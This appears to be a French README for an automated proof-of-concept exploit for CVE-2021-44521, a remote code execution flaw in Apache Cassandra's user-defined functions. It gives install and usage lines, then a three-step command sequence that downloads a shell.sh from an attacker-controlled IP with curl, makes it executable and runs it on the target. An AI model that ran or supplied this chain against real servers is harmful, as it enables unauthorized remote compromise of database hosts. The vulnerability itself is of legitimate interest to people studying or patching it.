
Exploit automatisé de preuve de concept pour CVE-2021-44521, permettant l'exécution de code à distance sur Apache Cassandra via des fonctions définies par l'utilisateur. Exécute des commandes arbitraires sur l'adresse IP cible.
PoC automatisé de la CVE-2021-44521 Crédits au PoC original : https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
Cassandra-driver
pip3 install cassandra-driver
python3 poc.py <ip> <cmd>
Notez que vous ne pouvez pas exécuter plusieurs commandes à la fois, ni utiliser de pipes pour le moment. Exécutez donc
pyhon3 poc.py <ip> "curl http://<votre-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"